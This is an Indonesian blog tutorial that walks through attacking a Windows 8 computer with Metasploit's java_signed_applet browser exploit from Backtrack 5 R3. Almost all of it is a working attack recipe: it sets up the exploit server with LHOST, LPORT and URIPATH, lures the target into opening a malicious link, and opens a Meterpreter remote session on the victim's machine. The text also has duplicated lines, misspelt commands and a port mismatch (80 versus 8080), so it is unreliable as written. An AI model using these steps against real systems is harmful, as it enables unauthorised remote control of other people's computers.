Target : 192.168.1.28 (Windows 8)
Penyerang : 192.168.1.27 (Backtrack 5 R3)
Penyerang : 192.168.1.27 (Backtrack 5 R3)
Yang perlu di persiapkan
1. Sistem Operasi Backtrack R3
2. Metasploit
3. Exploit
2. Metasploit
3. Exploit
Saatnya eksekusi :D
1. Buka Terminal pada Sistem Operasi Backtrack
2. Ketikan msfconcole pada terminal
3. Lalu ketikan use exploit/multi/browser/java_signed_applet
4. Untuk melihat opsi lebih lanjut pada exploit java_signed_applet ketikan show options
5. Atur IP anda set LHOST eg.192.168.1.27 , untuk yang belum mengetahuinya bisa mengetikan ifconfig pada terminal
6. Atur juga port yang akan anda gunakan msf: set LPORT 80
7. Atur alamat URI yang akan di eksekusi oleh target dengan cara set URIPATH /
8. Sekarang jalankan exploitnya exploit
9. Setelah target mengeksekusi link yang berisi exploit java_signed_applet tampilannya akan seperti ini
Contoh, target mengeksekusi link pada browser dengan alamat 192.168.1.27:8080
10. Ketiga target mengeksekusi link yang sebenarnya berisi exploit maka yang terjadi pada komputer kita session akan terbuka
11. Untuk melihat session dengan cara session -i
12. Untuk membuka Meterpreter dengan cara session -i 1 (1 adalah ID session)
No comments :